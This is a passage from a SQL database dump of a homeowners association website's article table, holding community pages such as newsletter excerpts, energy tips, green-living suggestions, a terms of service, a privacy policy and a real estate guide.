Days, and other such special events.</p>\r\n<p>Contact the Board at: <strong>info@hallcrestheights.org</strong><br /><br /><br /></p>','',1,2,'2013-06-07 17:58:40',47,'','2017-06-21 12:21:50',57,0,'0000-00-00 00:00:00','2013-06-07 17:58:40','0000-00-00 00:00:00','','','{\"show_title\":\"\",\"link_titles\":\"\",\"show_tags\":\"\",\"show_intro\":\"\",\"info_block_position\":\"\",\"info_block_show_title\":\"\",\"show_category\":\"0\",\"link_category\":\"0\",\"show_parent_category\":\"0\",\"link_parent_category\":\"0\",\"show_author\":\"\",\"link_author\":\"\",\"show_create_date\":\"\",\"show_modify_date\":\"\",\"show_publish_date\":\"\",\"show_item_navigation\":\"\",\"show_icons\":\"\",\"show_print_icon\":\"\",\"show_email_icon\":\"\",\"show_vote\":\"\",\"show_hits\":\"\",\"show_noauth\":\"\",\"urls_position\":\"\",\"alternative_readmore\":\"\",\"article_layout\":\"\",\"show_publishing_options\":\"\",\"show_article_options\":\"\",\"show_urls_images_backend\":\"\",\"show_urls_images_frontend\":\"\"}',26,5,'','',1,5414,'{\"robots\":\"\",\"author\":\"\",\"rights\":\"\",\"xreference\":\"\"}',0,'*',''),(10,50,'Community Newsletters','newsletter-article-1','<p><span style=\"font-size: medium;\"><strong>President\'s Report</strong></span></p>\r\n<p>NEW SALES RECORDS </p>\r\n<p>This Spring showcased two new sales records in Hallcrest. Previously, $685,000 was the record sales price, but recent sales of over $690,000 established not only a new ceiling, but an intriguing example of how to prepare, stage, and show a home for a quick sale. Both homes garnered multiple competing contracts, one of which was secured even before the home was listed. When you consider that both of these homes sold for considerably over the asking price, plus had no contingencies or home inspection “hiccups,” it is well worth detailing what the owners did to achieve such astonishing results. One home, while upgraded in many ways, still had a lower level that was in serious need of an expensive remodeling project. Thus, it was stripped down to the studs, removing the dreaded “popcorn” ceiling and old faux paneling, installed modern insulation, recessed lighting, ceramic floor tiling, upgraded electrical components, and achieved a significantly modernized approach to the adjoining patio. This home, marketed by an experienced realtor who had sold other Hallcrest homes, did all the right things to reach out to qualified buyers, as well as staging and showing the home for a quick sale after the owners had moved out. The other home, which contracted for $11,000 over the listed price, illustrate an even better example of “for-sale preparation.” In this case, the owner set aside more than a year of showcase demonstration effort: cleaning, painting, adding small and inexpensive improvements (such as crown moldings) in addition to several years of incrementally upgrading major appliances, electrical, plumbing and HVAC systems - all the things that most home inspectors have at the top of their lists. Thanks to Association education efforts, the owner was well aware that Virginia was in the process of establishing a license requirement for home inspectors...(for the full report, click <a href=\"files/HH Newsletter 201704.pdf\" rel=\"alternate\">here.</a>)<br /><br /></p>','',1,8,'2013-06-07 18:01:44',47,'','2017-06-21 13:20:08',57,57,'2017-06-21 13:20:08','2013-06-07 18:01:44','0000-00-00 00:00:00','','','{\"show_title\":\"0\",\"link_titles\":\"0\",\"show_tags\":\"\",\"show_intro\":\"\",\"info_block_position\":\"\",\"info_block_show_title\":\"\",\"show_category\":\"0\",\"link_category\":\"0\",\"show_parent_category\":\"\",\"link_parent_category\":\"\",\"show_author\":\"\",\"link_author\":\"\",\"show_create_date\":\"\",\"show_modify_date\":\"\",\"show_publish_date\":\"\",\"show_item_navigation\":\"\",\"show_icons\":\"\",\"show_print_icon\":\"\",\"show_email_icon\":\"\",\"show_vote\":\"\",\"show_hits\":\"\",\"show_noauth\":\"\",\"urls_position\":\"\",\"alternative_readmore\":\"\",\"article_layout\":\"\",\"show_publishing_options\":\"\",\"show_article_options\":\"\",\"show_urls_images_backend\":\"\",\"show_urls_images_frontend\":\"\"}',48,0,'','',1,368,'{\"robots\":\"\",\"author\":\"\",\"rights\":\"\",\"xreference\":\"\"}',0,'*',''),(11,51,'Energy Tips','energy-tips','<p>Winter is coming and if you have not added insulation to the original R-6 insulation installed more than 40 years ago; you will be leaking your energy dollars through your roof all winter long. We have located a vendor who is willing to discount 15% if three or more residents decide to install on the same day.</p>\r\n','\r\n<h3 style=\"text-align: center;\">Yes, you can do it too!<br /> <br /> <img src=\"images/interests/energy_tips1.jpg\" width=\"594px\" /></h3>\r\n<h3 style=\"text-align: center;\"><br />Energy Tip #1</h3>\r\n<p>Winter is coming and if you have not added insulation to the original R-6 insulation installed more than 40 years ago; you will be leaking your energy dollars through your roof all winter long. We have located a vendor who is willing to discount 15% if three or more residents decide to install on the same day.</p>\r\n<p>See Capital Insulation\'s price list. <span style=\"text-decoration: underline;\"><a href=\"files/Attic_Insulation_Information.pdf\">Attic Insulation Information</a></span><br /><br /></p>\r\n<h3 style=\"text-align: center;\">Energy Tip #2</h3>\r\n<p>Ten easy steps to save money and control your enviornment.</p>\r\n<p>Go to this link. <a href=\"files/Ten_Energy_Tips.pdf\">Ten Energy Tips</a><br /><br /></p>\r\n<h3 style=\"text-align: center;\">Energy Tip #3</h3>\r\n<h3 style=\"text-align: center;\">What are other people doing?</h3>\r\n<p><span id=\"kVbAn2\"><br /> <img src=\"images/interests/energy_tips2.jpg\" width=\"594px\" style=\"display: block; margin-left: auto; margin-right: auto;\" /></span></p>\r\n<p><br />Why do people take action to reduce energy consuption?</p>\r\n<ul style=\"list-style-type: disc;\">\r\n<li>77% to lower energy cost</li>\r\n<li>54% reduce environmental impact</li>\r\n<li>36% take advantage of rebate or credit</li>\r\n</ul>',1,9,'2013-06-11 16:40:46',47,'','2013-11-05 13:51:39',47,0,'0000-00-00 00:00:00','2013-06-11 16:40:46','0000-00-00 00:00:00','','','{\"show_title\":\"\",\"link_titles\":\"\",\"show_tags\":\"\",\"show_intro\":\"\",\"info_block_position\":\"\",\"show_category\":\"\",\"link_category\":\"\",\"show_parent_category\":\"\",\"link_parent_category\":\"\",\"show_author\":\"\",\"link_author\":\"\",\"show_create_date\":\"\",\"show_modify_date\":\"\",\"show_publish_date\":\"\",\"show_item_navigation\":\"\",\"show_icons\":\"\",\"show_print_icon\":\"\",\"show_email_icon\":\"\",\"show_vote\":\"\",\"show_hits\":\"\",\"show_noauth\":\"\",\"urls_position\":\"\",\"alternative_readmore\":\"\",\"article_layout\":\"\",\"show_publishing_options\":\"\",\"show_article_options\":\"\",\"show_urls_images_backend\":\"\",\"show_urls_images_frontend\":\"\"}',18,4,'','',1,1168,'{\"robots\":\"\",\"author\":\"\",\"rights\":\"\",\"xreference\":\"\",\"tags\":null}',0,'*',''),(12,53,'Go Green','go-green','<h3>10 Ways to Green Your Community</h3>\r\n<p>The Community Association Institute Foundation\'s latest contribution to the community association industry is Green Communities, an 80-page, free resource on best practices that community leaders and managers can use to encourage their associations to be more environmentally friendly. </p>\r\n','\r\n<h3>10 Ways to Green Your Community</h3>\r\n<p>The Community Association Institute Foundation\'s latest contribution to the community association industry is Green Communities, an 80-page, free resource on best practices that community leaders and managers can use to encourage their associations to be more environmentally friendly. Please click on the Green Communities link above to access this document. It addresses transportation, waste, governing documents, land-use, building and energy management and more. It includes four case studies and \"Top 10 Ways to Help Your Community Go Green.\"</p>\r\n<h3>\"Top 10 Ways to Help Your Community Go Green\"</h3>\r\n<p>1. Educate your board of directors and ask it to adopt a green mission and vision for your community.<br /><br />2. Promote and support a comprehensive recycling program for your community. Reward best recyclers.<br /><br />3. Develop and promote architectural review guidelines that encourage regionally appropriate, drought-resistant indigenous plants. Better yet, encourage returning community and private areas to forest, prairie, desert or dunes—whatever is appropriate to your community. Announce “most attractive native landscape in a member’s yard” in your newsletter. Give the winner a compost bin<br /><br />4. If your community is an urban high-rise, find a way to attract hawks to nest, or create a green roof space for members that attracts hummingbirds. Or host a window garden competition. Announce the results to your membership.<br /><br />5. When it makes sense, purchase smaller fuel-efficient vehicles, including electric or hybrid models, for personnel. Label the vehicles clearly to make a favorable impression with residents and visitors.<br /><br />6. Install programmable thermostats in community buildings. Establish an HVAC equipment service program. Publish your success.<br /><br />7. Post a note on each of your paper towel dispensers: “Remember, These Come from Trees.” This message could save up to 100 pounds of paper every year.<br /><br />8. Install solar heaters and/or heat pumps to supplement pool heating. Install pool covers to reduce heat loss.<br /><br />9. Develop architectural review committee guidelines that provide some type of incentive, or at least kudos, for adopting LEEDs or Earthcraft practices in a home or building. Promote the construction or the modification with “Earth Friendly House Under Construction/Modification Here” signage. Brag about these members in the community newsletter.<br /><br />10. Look around for opportunities to inspire your membership. Find a band of brave souls who will champion your cause – your Green Team. Many citizens would love to get involved in this stuff! Publicize the good deeds of your Green Team.<br /><br />If you are interested in joining the Go-Green effort, can contact: the Board for more information.</p>\r\n<p> </p>',1,9,'2013-06-12 11:43:53',47,'','2013-11-05 13:50:03',47,0,'0000-00-00 00:00:00','2013-06-12 11:43:53','0000-00-00 00:00:00','','','{\"show_title\":\"\",\"link_titles\":\"\",\"show_tags\":\"\",\"show_intro\":\"\",\"info_block_position\":\"\",\"show_category\":\"\",\"link_category\":\"\",\"show_parent_category\":\"\",\"link_parent_category\":\"\",\"show_author\":\"\",\"link_author\":\"\",\"show_create_date\":\"\",\"show_modify_date\":\"\",\"show_publish_date\":\"\",\"show_item_navigation\":\"\",\"show_icons\":\"\",\"show_print_icon\":\"\",\"show_email_icon\":\"\",\"show_vote\":\"\",\"show_hits\":\"\",\"show_noauth\":\"\",\"urls_position\":\"\",\"alternative_readmore\":\"\",\"article_layout\":\"\",\"show_publishing_options\":\"\",\"show_article_options\":\"\",\"show_urls_images_backend\":\"\",\"show_urls_images_frontend\":\"\"}',12,5,'','',1,1226,'{\"robots\":\"\",\"author\":\"\",\"rights\":\"\",\"xreference\":\"\",\"tags\":null}',0,'*',''),(13,56,'Terms of Service','terms-of-service','<p>PLEASE READ THESE TERMS AND CONDITIONS OF USE CAREFULLY BEFORE USING THIS SITE. By using this site (hallcrestheights.org), you signify your assent to these terms of use. If you do not agree to these terms of use, please do not use the site. Hallcrest Heights reserves the right, at its sole discretion, to change, modify, add, or remove portions of these terms at any time. Please check these terms periodically for changes. Your continued use of this site following the posting of changes to these terms will mean you accept and agree to the changes.</p>\r\n<p style=\"font-weight: bold; margin: 40px 0px 0px;\">RESTRICTIONS ON USE</p>\r\n<p>This site is owned and operated by Hallcrest Heights Assoicates Inc. (the Hallcrest Heights community home owners association) and contains material which is derived in whole or in part from material supplied by the Hallcrest Heights community and other sources, and is protected by copyright and trademark laws. You may not modify, copy, reproduce, republish, upload, post, transmit or distribute in any way any material from this site including code and software (\"Material\"). You may download Material from this site for your personal, non-commercial use only, provided you keep intact all copyright and other proprietary notices. Except as expressly permitted under copyright law, no copying, redistribution, retransmission, publication or commercial exploitation of downloaded Material will be permitted without the express permission of Hallcrest Heights and the copyright owner.</p>\r\n<p style=\"font-weight: bold; margin: 40px 0px 0px;\">DISCLAIMER</p>\r\n<p>Hallcrest Heights HAS PROVIDED LINKS AND POINTERS TO INTERNET SITES MAINTAINED BY THIRD PARTIES (\"THIRD PARTY SITES\") AND MAY FROM TIME TO TIME PROVIDE THIRD PARTY MATERIALS ON THIS SITE. NEITHER Hallcrest Heights NOR ITS AFFILIATES OPERATE OR CONTROL IN ANY RESPECT ANY INFORMATION, PRODUCTS OR SERVICES ON THESE THIRD PARTY SITES. THE MATERIALS IN THIS SITE AND THE THIRD PARTY SITES ARE PROVIDED \"AS IS\" AND WITHOUT WARRANTIES OF ANY KIND EITHER EXPRESS OR IMPLIED. TO THE FULLEST EXTENT PERMISSIBLE PURSUANT TO APPLICABLE LAW, Hallcrest Heights DISCLAIMS ALL WARRANTIES, EXPRESS OR IMPLIED, INCLUDING, BUT NOT LIMITED TO, IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE. Hallcrest Heights DOES NOT WARRANT THAT THE FUNCTIONS CONTAINED IN THE MATERIALS AND PRODUCTS WILL BE UNINTERRUPTED OR ERROR-FREE, THAT DEFECTS WILL BE CORRECTED, OR THAT THIS SITE, INCLUDING FORUMS, OR THE SERVER THAT MAKES IT AVAILABLE ARE FREE OF VIRUSES OR OTHER HARMFUL COMPONENTS. Hallcrest Heights DOES NOT WARRANT OR MAKE ANY REPRESENTATIONS REGARDING THE USE OR THE RESULTS OF THE USE OF THE MATERIALS IN THIS SITE OR IN THIRD PARTY SITES IN TERMS OF THEIR CORRECTNESS, ACCURACY, TIMELINESS, RELIABILITY OR OTHERWISE. YOU (AND NOT Hallcrest Heights) ASSUME THE ENTIRE COST OF ALL NECESSARY MAINTENANCE, REPAIR OR CORRECTION.</p>\r\n<p style=\"font-weight: bold; margin: 40px 0px 0px;\">LIMITATION OF LIABILITY</p>\r\n<p>Under no circumstances, including, but not limited to, negligence, shall Hallcrest Heights, its sponsors, or its affiliates be liable to you for any damages of any kind (including, but not limited to, compensatory damages, lost profits, lost data or any form of special, incidental, indirect, consequential or punitive damages whether based on breach of contract or warranty, tort, product liability or otherwise) that result from the use of, or the inability to use, this site or the Materials. You specifically acknowledge and agree that Hallcrest Heights is not liable for any defamatory, offensive or illegal conduct of any user. If you are dissatisfied with any Hallcrest Heights material, or with any of Hallcrest Heights\'s terms and conditions, your sole and exclusive remedy is to discontinue using Hallcrest Heights.</p>\r\n<p>You agree to indemnify, defend and hold Hallcrest Heights, its agents, affiliates, subsidiaries, directors, officers, employees, and applicable third parties (e.g. relevant advertisers, syndication partners, licensors, licensees, consultants and contractors) (collectively \"Indemnified Person(s)\") harmless from and against any and all third party claims, liability, loss, and expense (including damage awards, settlement amounts, and reasonable legal fees), brought against any Indemnified Person(s), arising out of, related to or which may arise from your use of all services, the Materials, and/or Your breach of any term of this Agreement.</p>\r\n<p style=\"font-weight: bold; margin: 40px 0px 0px;\">TERMINATION</p>\r\n<p>This agreement is effective until terminated by Hallcrest Heights, at any time without notice. In the event of termination, you are no longer authorized to access the Forums and the restrictions imposed on you with respect to material downloaded from the Forums and the disclaimers and limitations of liabilities set forth in this agreement shall survive.</p>\r\n<p style=\"font-weight: bold; margin: 40px 0px 0px;\">CHANGED TERMS</p>\r\n<p>Hallcrest Heights reserves the right at its discretion to change or modify these Terms and Conditions or to impose new conditions at any time. Such changes, modifications, additions or deletions shall be effective immediately upon notice thereof, which may be given by any lawful means including, without limitation, posting of such changes on this page.</p>\r\n<p style=\"font-weight: bold; margin: 40px 0px 0px;\">OTHER</p>\r\n<p>This agreement shall be governed by and construed in accordance with the laws of the State of Virginia without giving effect to any principles of conflicts of law. If any provision of this agreement shall be unlawful, void, or for any reason unenforceable then that provision shall be deemed severable from this agreement and shall not affect the validity and enforceability of any remaining provisions.</p>','',1,2,'2013-06-13 14:05:52',47,'','2017-01-15 16:54:04',50,0,'0000-00-00 00:00:00','2013-06-13 14:05:52','0000-00-00 00:00:00','','','{\"show_title\":\"\",\"link_titles\":\"\",\"show_tags\":\"\",\"show_intro\":\"\",\"info_block_position\":\"\",\"info_block_show_title\":\"\",\"show_category\":\"\",\"link_category\":\"\",\"show_parent_category\":\"\",\"link_parent_category\":\"\",\"show_author\":\"\",\"link_author\":\"\",\"show_create_date\":\"\",\"show_modify_date\":\"\",\"show_publish_date\":\"\",\"show_item_navigation\":\"\",\"show_icons\":\"\",\"show_print_icon\":\"\",\"show_email_icon\":\"\",\"show_vote\":\"\",\"show_hits\":\"\",\"show_noauth\":\"\",\"urls_position\":\"\",\"alternative_readmore\":\"\",\"article_layout\":\"\",\"show_publishing_options\":\"\",\"show_article_options\":\"\",\"show_urls_images_backend\":\"\",\"show_urls_images_frontend\":\"\"}',2,4,'','',1,2117,'{\"robots\":\"\",\"author\":\"\",\"rights\":\"\",\"xreference\":\"\"}',0,'*',''),(14,57,'Privacy Policy','privacy-policy','<div style=\"margin: 10px;\">\r\n<p>If you have questions regarding this privacy statement, please contact Hallcrest Heights (<a href=\"mailto:info@hallcrestheights.org\">info@hallcrestheights.org</a>).</p>\r\n<p>Hallcrest Heights is committed to protect user privacy. The following statements disclose our practices on hallcrestheights.org (the \"Website\") regarding information gathering and dissemination.</p>\r\n<p style=\"font-weight: bold; margin: 40px 0px 0px;\">Personal Information</p>\r\n<p>It is Hallcrest Heights\'s intention to give you as much control as possible over your personal information. In general, you can visit the Website without revealing any personal information. However, to access restricted areas, we may need information from you, such as your site username, password. It is our intent to let you know before we collect personal information from you.</p>\r\n<p>Hallcrest Heights will not collect your personal information nor distribute or sell any of your personal information to third parties.</p>\r\n<p>Public Forums</p>\r\n<p>The Website does not have chat rooms, forums, or message boards available to its visitors.</p>\r\n<p style=\"font-weight: bold; margin: 40px 0px 0px;\">Security</p>\r\n<p>The Website has security measures in place to protect the loss, misuse and alteration of the information under our control. We back up the entire Website periodically, and have password protected access levels which ensure legitimate site administration.</p>\r\n<p style=\"font-weight: bold; margin: 40px 0px 0px;\">Cookies</p>\r\n<p>There is a technology called \"cookies\" which can be used to provide you with tailored information from a website. A cookie is an element of data that a website can send to your browser, which may then store it on your system. Some Website pages use cookies so that we can better serve you when you visit and then return to our site.</p>\r\n<p style=\"font-weight: bold; margin: 40px 0px 0px;\">If we make any material changes to our privacy practices, we will notify you via email regardless of your privacy settings. We will also post a revised privacy page 30 days prior to any change.</p>\r\n<p>If you have any questions or comments about this privacy statement or the practices of this Website you can contact Hallcrest Heights at <a href=\"mailto:info@hallcrestheights.org\">info@hallcrestheights.org</a>.</p>\r\n</div>','',1,2,'2013-06-13 14:07:19',47,'','2017-01-15 16:46:09',50,0,'0000-00-00 00:00:00','2013-06-13 14:07:19','0000-00-00 00:00:00','','','{\"show_title\":\"\",\"link_titles\":\"\",\"show_tags\":\"\",\"show_intro\":\"\",\"info_block_position\":\"\",\"info_block_show_title\":\"\",\"show_category\":\"\",\"link_category\":\"\",\"show_parent_category\":\"\",\"link_parent_category\":\"\",\"show_author\":\"\",\"link_author\":\"\",\"show_create_date\":\"\",\"show_modify_date\":\"\",\"show_publish_date\":\"\",\"show_item_navigation\":\"\",\"show_icons\":\"\",\"show_print_icon\":\"\",\"show_email_icon\":\"\",\"show_vote\":\"\",\"show_hits\":\"\",\"show_noauth\":\"\",\"urls_position\":\"\",\"alternative_readmore\":\"\",\"article_layout\":\"\",\"show_publishing_options\":\"\",\"show_article_options\":\"\",\"show_urls_images_backend\":\"\",\"show_urls_images_frontend\":\"\"}',2,3,'','',1,4041,'{\"robots\":\"\",\"author\":\"\",\"rights\":\"\",\"xreference\":\"\"}',0,'*',''),(15,65,'The Hallcrest Annual Meeting','the-hallcrest-annual-meeting','<p>Annual Meetings of most communities have narrow agendas to vote on various matters and discuss problems. We opted not to do that – mainly because an annual meeting is a chance to enlighten ALL residents and not just to answer concerns of owners. </p>\r\n','\r\n<p>Annual Meetings of most communities have narrow agendas to vote on various matters and discuss problems. We opted not to do that – mainly because an annual meeting is a chance to enlighten ALL residents and not just to answer concerns of owners. The Hallcrest philosophy is that its Board of Director (during their monthly meetings, which are open to all members of the community) should be the time to discuss concerns and make decisions. The annual meeting is a chance for presentations on major issues of interest to all, to distribute documents of interest to all, to meet new neighbors, answer questions. The election of a Board, the budget, the audit etc. can be disposed of in 10 to 15 minutes. Last year we had a major presentation by a panel of experts on foreclosures, short sales, credit problems, sales requirements, mortgages, legal matters, and public programs that help people concerned about such. Meeting like this usually attract about 100 residents… of course the desserts and refreshments help!</p>',1,9,'2013-11-05 13:53:22',47,'','2013-11-05 13:55:42',47,0,'0000-00-00 00:00:00','2013-11-05 13:53:22','0000-00-00 00:00:00','','','{\"show_title\":\"\",\"link_titles\":\"\",\"show_tags\":\"\",\"show_intro\":\"0\",\"info_block_position\":\"\",\"show_category\":\"\",\"link_category\":\"\",\"show_parent_category\":\"\",\"link_parent_category\":\"\",\"show_author\":\"\",\"link_author\":\"\",\"show_create_date\":\"\",\"show_modify_date\":\"\",\"show_publish_date\":\"\",\"show_item_navigation\":\"\",\"show_icons\":\"\",\"show_print_icon\":\"\",\"show_email_icon\":\"\",\"show_vote\":\"\",\"show_hits\":\"\",\"show_noauth\":\"\",\"urls_position\":\"\",\"alternative_readmore\":\"\",\"article_layout\":\"\",\"show_publishing_options\":\"\",\"show_article_options\":\"\",\"show_urls_images_backend\":\"\",\"show_urls_images_frontend\":\"\"}',2,3,'','',1,1299,'{\"robots\":\"\",\"author\":\"\",\"rights\":\"\",\"xreference\":\"\",\"tags\":null}',0,'*',''),(16,66,'How to avoid “special assessments”','how-to-avoid-special-assessments','<p>Hallcrest has had only one special assessment… and anticipates never having another. The solution is to have a substantial reserve account that funds problems like street paving, sidewalk repair and issues with community infrastructure.</p>\r\n','\r\n<p>Hallcrest has had only one special assessment… and anticipates never having another. The solution is to have a substantial reserve account that funds problems like street paving, sidewalk repair and issues with community infrastructure. On a regular basis the Hallcrest Association schedules contractors to estimate the cost and work involved in addressing issues to ensure our reserves can support what is needed to do the job, should a problem arise. Our annual budget is based on making regular provisions for this. The specter of a special assessment is something that all real estate agents dread even discussing with buyers. When an Open House is scheduled, the Board will make sure that the agent fully understands our provision for this. It is one of the characteristics that sets us apart from many similar communities and makes Hallcrest such a desirable community to live in.</p>',1,9,'2013-11-05 13:58:29',47,'','0000-00-00 00:00:00',0,0,'0000-00-00 00:00:00','2013-11-05 13:58:29','0000-00-00 00:00:00','','','{\"show_title\":\"\",\"link_titles\":\"\",\"show_tags\":\"\",\"show_intro\":\"0\",\"info_block_position\":\"\",\"show_category\":\"\",\"link_category\":\"\",\"show_parent_category\":\"\",\"link_parent_category\":\"\",\"show_author\":\"\",\"link_author\":\"\",\"show_create_date\":\"\",\"show_modify_date\":\"\",\"show_publish_date\":\"\",\"show_item_navigation\":\"\",\"show_icons\":\"\",\"show_print_icon\":\"\",\"show_email_icon\":\"\",\"show_vote\":\"\",\"show_hits\":\"\",\"show_noauth\":\"\",\"urls_position\":\"\",\"alternative_readmore\":\"\",\"article_layout\":\"\",\"show_publishing_options\":\"\",\"show_article_options\":\"\",\"show_urls_images_backend\":\"\",\"show_urls_images_frontend\":\"\"}',1,2,'','',1,1515,'{\"robots\":\"\",\"author\":\"\",\"rights\":\"\",\"xreference\":\"\",\"tags\":null}',0,'*',''),(17,69,'Hallcrest Heights Real Estate Guide','hallcrest-heights-real-estate-guide','<h3>Superior Design</h3>\r\n<p>Hallcrest Heights, consisting of 158 townhomes (with 50 end units), was developed in five phases between 1969 and 1972. The 18-acre site was planned and engineered by the respected firms of Dewberry, Nealon & Davis (Phases I and II) and Patton, Harris & Foard (Phases III, IV and V). All homes are three-level and were adapted to the gently rolling topography .</p>\r\n<p>Hallcrest Heights has a large amount of green space--six separate park-like areas spread throughout the community. While 40% of the site is dedicated to home lots, 38% is in common areas, while the remaining 22% is used for streets and parking. The ratio of open space is more favorable than that of most similar town home communities. Among the 158 townhomes (with 50 end units), there are about six separate models of floor plans. All feature a patio/garden; some have two fireplaces, walk-in closets and bay windows. All are three-level homes with finished lower levels. Many have four bedrooms and three and one-half baths.</p>\r\n<p>Compared to buildings built today, the homes in Hallcrest Heights are superior in many ways in the manner in which they were constructed. Some examples:</p>\r\n<h3>Exterior:</h3>\r\n<ul>\r\n<li>Hallcrest homes were designed so that each one has a sturdy and different aesthetic appearance while maintaining the character of Colonial Williamsburg.</li>\r\n<li>Houses have all brick exteriors.</li>\r\n<li>Brick colors and finishes are different in order to individualize each home.</li>\r\n<li>Fronts of homes are mostly offset from each other to further define each home.</li>\r\n<li>Fronts entrance treatments are all different.</li>\r\n<li>While all homes have a colonial design, they are distinguished through the use of different window treatments, including bay windows, shutters and setbacks.</li>\r\n<li>The roof materials (shingles, metal), treatments (pitched, mansard, flat) and colors are varied.</li>\r\n<li>The homes are grouped into relatively small blocks with larger than usual open spaces separating them.</li>\r\n</ul>\r\n<p>The homes are constructed using more substantial materials and methods than those being incorporated into homes built today, in the following ways:<br />All construction below grade is made of concrete block with concrete footings. The floor joist and girders are solid seasoned lumber rather than built-up members. The roof trusses are also constructed of solid lumber. All units have at least one brick fireplace with brick hearth. All units are separated by masonry firewalls. Electrical systems use copper wiring. Patio/Gardens have brick outer walls.</p>\r\n<h3>Interior:</h3>\r\n<p>The homes were finished using materials and finishes that are superior to those used today.</p>\r\n<ul>\r\n<li>All moldings are solid wood rather than pieced moldings.</li>\r\n<li>All floors, except in kitchen, are hardwood tile or marble.</li>\r\n<li>Dining rooms have paneled wainscots.</li>\r\n<li>Ceilings on lower level are textured.</li>\r\n<li>Stair handrails are decorative wood or wrought iron.</li>\r\n</ul>\r\n<h3>Floor Plans:</h3>\r\n<ul>\r\n<li><a href=\"images/realestateguide/20100801020139-11432-9762317392-6150621.pdf\" target=\"_blank\">The Bradford</a></li>\r\n<li><a href=\"images/realestateguide/20100801020044-11430-2452661800-22286604.pdf\" target=\"_blank\">The Bradford 2</a></li>\r\n<li><a href=\"images/realestateguide/20100801020205-11434-40642443-15023750.pdf\">The Cavalier</a></li>\r\n<li><a href=\"images/realestateguide/20100801020229-11436-6188095072-633776.pdf\" target=\"_blank\">The Cavalier 2</a></li>\r\n</ul>\r\n<table border=\"0\" cellspacing=\"0\" cellpadding=\"2\">\r\n<tbody>\r\n<tr>\r\n<td><a href=\"images/realestateguide/20100801020139-11432-9762317392-6150621.pdf\" target=\"_blank\"><img src=\"images/realestateguide/TheBradford.jpg\" alt=\"The Bradford\" title=\"The Bradford\" width=\"288\" height=\"212\" style=\"vertical-align: middle;\" /></a></td>\r\n<td><a href=\"images/realestateguide/20100801020044-11430-2452661800-22286604.pdf\" target=\"_blank\"><img src=\"images/realestateguide/TheBradford2.jpg\" alt=\"The Bradford 2\" title=\"The Bradford 2\" width=\"288\" height=\"213\" style=\"vertical-align: middle;\" /></a></td>\r\n</tr>\r\n<tr>\r\n<td><a href=\"images/realestateguide/20100801020205-11434-40642443-15023750.pdf\" target=\"_blank\"><img src=\"images/realestateguide/TheCavalier.jpg\" alt=\"The Cavalier\" title=\"The Cavalier\" width=\"288\" height=\"211\" style=\"vertical-align: middle;\" /></a></td>\r\n<td><a href=\"images/realestateguide/20100801020229-11436-6188095072-633776.pdf\" target=\"_blank\"><img src=\"images/realestateguide/TheCavalier2.jpg\" alt=\"The Cavalier 2\" title=\"The Cavalier 2\" width=\"288\" height=\"213\" style=\"vertical-align: middle;\" /></a></td>\r\n</tr>\r\n</tbody>\r\n</table>','',1,2,'2013-11-28 14:40:59',47,'','2013-11-28 15:33:16',47,0,'0000-00-00 00:00:00','2013-11-28 14:40:59','0000-00-00 00:00:00','','','{\"show_title\":\"\",\"link_titles\":\"\",\"show_tags\":\"\",\"show_intro\":\"\",\"info_block_position\":\"\",\"show_category\":\"\",\"link_category\":\"\",\"show_parent_category\":\"\",\"link_parent_category\":\"\",\"show_author\":\"\",\"link_author\":\"\",\"show_create_date\":\"\",\"show_modify_date\":\"\",\"show_publish_date\":\"\",\"show_item_navigation\":\"\",\"show_icons\":\"\",\"show_print_icon\":\"\",\"show_email_icon\":\"\",\"show_vote\":\"\",\"show_hits\":\"\",\"show_noauth\":\"\",\"urls_position\":\"\",\"alternative_readmore\":\"\",\"article_layout\":\"\",\"show_publishing_options\":\"\",\"show_article_options\":\"\",\"show_urls_images_backend\":\"\",\"show_urls_images_frontend\":\"\"}',5,2,'','',1,3115,'{\"robots\":\"\",\"author\":\"\",\"rights\":\"\",\"xreference\":\"\",\"tags\":null}',0,'*',''),(18,70,'Survey','2015-survey','<p style=\"text-align: center;\"><a title=\"Take the survey now! (Opens in new window.)\" href=\"http://goo.gl/forms/pUQ5NQfCNI\" target=\"_blank\"><span style=\"font-size: large;\"><em><strong><img title=\"Survey\" src=\"images/SurveyHeader.PNG\" alt=\"Take the survey now!\" /></strong></em></span></a></p>\r\n<p style=\"text-align: left;\">PRIVACY NOTICE: No personal information or individual responses will be shared within the Hallcrest community or with any third party. Responses will only be communicated in aggregate. All information provided will be handled in strictest confidentiality and will only be utilized for the growth and development of the Hallcrest Heights community.</p>\r\n<p>We would like to thank you in advance for participating in the 2015 Hallcrest Heights Resident Survey. The primary purpose is to ensure each resident/household\'s voice is represented as the board strives to continually make Hallcrest a desirable community for current and future residents. Help us help you! The survey addresses the following items and all questions are optional: </p>\r\n<ul>\r\n<li>Quality of Life</li>\r\n<li>Community Involvement (within Hallcrest, outside Hallcrest)</li>\r\n<li>Community Concerns (metro, parking, safety, grounds, services, utilities)</li>\r\n<li>Home Improvements</li>\r\n<li>Families and Children</li>\r\n<li>Pets</li>\r\n<li>Special Needs (from snow removal to carpooling)</li>\r\n<li>Board Responsibility</li>\r\n<li>Emergency Management</li>\r\n</ul>\r\n<p>If you have any further feedback or questions about this survey, please email survey@hallcrestheights.org</p>','',0,9,'2015-04-26 00:07:28',53,'','2016-12-31 14:13:55',50,0,'0000-00-00 00:00:00','2015-05-01 20:04:00','0000-00-00 00:00:00','','','{\"show_title\":\"0\",\"link_titles\":\"0\",\"show_tags\":\"\",\"show_intro\":\"\",\"info_block_position\":\"\",\"show_category\":\"0\",\"link_category\":\"0\",\"show_parent_category\":\"\",\"link_parent_category\":\"\",\"show_author\":\"\",\"link_author\":\"\",\"show_create_date\":\"\",\"show_modify_date\":\"\",\"show_publish_date\":\"\",\"show_item_navigation\":\"\",\"show_icons\":\"\",\"show_print_icon\":\"\",\"show_email_icon\":\"\",\"show_vote\":\"\",\"show_hits\":\"\",\"show_noauth\":\"\",\"urls_position\":\"\",\"alternative_readmore\":\"\",\"article_layout\":\"\",\"show_publishing_options\":\"\",\"show_article_options\":\"\",\"show_urls_images_backend\":\"\",\"show_urls_images_frontend\":\"\"}',33,1,'','',1,1186,'{\"robots\":\"noindex, nofollow\",\"author\":\"\",\"rights\":\"\",\"xreference\":\"\"}',1,'*',''),(19,71,'Take the Survey now!','take-the-survey-now','<p>Loading...</p>','',-2,2,'2015-05-09 17:58:04',53,'','0000-00-00 00:00:00',0,0,'0000-00-00 00:00:00','2015-05-09 17:58:04','0000-00-00 